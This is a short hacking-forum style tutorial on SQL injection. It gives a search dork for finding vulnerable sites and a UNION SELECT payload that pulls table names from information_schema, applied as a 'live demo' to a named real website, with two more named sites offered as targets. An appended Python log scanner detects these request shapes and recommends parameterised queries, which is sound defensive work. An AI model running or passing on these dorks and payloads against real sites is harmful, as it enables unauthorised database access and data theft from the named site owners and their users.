Assalamualaikum and greetings. Huhu, can't sleep again. Shall we learn some more?
1. Find a target website using the dork:
inurl:php?id= "graphic web design by BuyWebArt"
2. Open the chosen site and apply SQLI as shown below:
Example:
http://target.com/path/XXX.php?id=X&id=[SQLI HERE]
-----Legend-------
XXX = page name
X = page ID
-----------------------
4. Live Demo :
http://www.mudracard.com/send-gift-cards.php?id=8
Example (finding tables):
http://www.mudracard.com/send-gift-cards.php?id=-8+union+select+1,2,group_concat(table_name),4,5,6,7,8+from+information_schema.tables+where+table_schema=database()--
----------Legend-----------
GREEN = VULNERABLE LINK
RED = SQLI
--------------------------------
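
Added example (not part of the original post): a log check a site owner can run to spot the two request shapes shown above, a repeated id parameter and a UNION SELECT against information_schema, in web server access logs. The log lines, hosts and paths are constructed samples, and the rule names are illustrative.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in common log format (addresses and paths are made up).
SAMPLE_LOG = """\
198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /cards.php?id=8 HTTP/1.1" 200 5120
198.51.100.9 - - [01/Jan/2024:10:00:05 +0000] "GET /cards.php?id=-8+union+select+1,2,group_concat(table_name),4+from+information_schema.tables+where+table_schema=database()-- HTTP/1.1" 200 6033
198.51.100.9 - - [01/Jan/2024:10:00:09 +0000] "GET /page.php?id=3&id=3%20UNION%20SELECT%201 HTTP/1.1" 200 4410
203.0.113.4 - - [01/Jan/2024:10:01:00 +0000] "GET /news.php?title=credit+union+rates HTTP/1.1" 200 2048
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Illustrative rules, matched against each URL-decoded parameter value.
RULES = {
    "union_select": re.compile(r"\bunion\b\s+(?:all\s+)?\bselect\b", re.I),
    "information_schema": re.compile(r"\binformation_schema\b", re.I),
}

def inspect_line(line):
    """Return (client, path, sorted reasons) for one log line, or None if unparsable."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    client, target = m.groups()
    parts = urlsplit(target)
    # parse_qsl decodes %20 and '+' so encoded payloads are matched in clear form.
    pairs = parse_qsl(parts.query, keep_blank_values=True)
    reasons = set()
    # The same parameter name sent twice (id=X&id=...) is unusual for normal links.
    for name, count in Counter(n for n, _ in pairs).items():
        if count > 1:
            reasons.add(f"duplicate_param:{name}")
    for _, value in pairs:
        for label, rx in RULES.items():
            if rx.search(value):
                reasons.add(label)
    return client, parts.path, sorted(reasons)

def scan(log_text):
    """Return only the requests that triggered at least one rule."""
    results = (inspect_line(line) for line in log_text.splitlines())
    return [r for r in results if r and r[2]]

if __name__ == "__main__":
    for client, path, reasons in scan(SAMPLE_LOG):
        print(client, path, ", ".join(reasons))
```

A hit on these rules means the request should be reviewed; the fix on the application side is to bind the id value as a query parameter instead of concatenating it into the SQL string.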
Other demo :
- http://synergy-pune.com/page.php?id=german
- http://www.youthejournalist.com/article.php?aid=3649&sid=19
Credit to Infamous from 1337day.com
That's all...
Assalamualaikum~~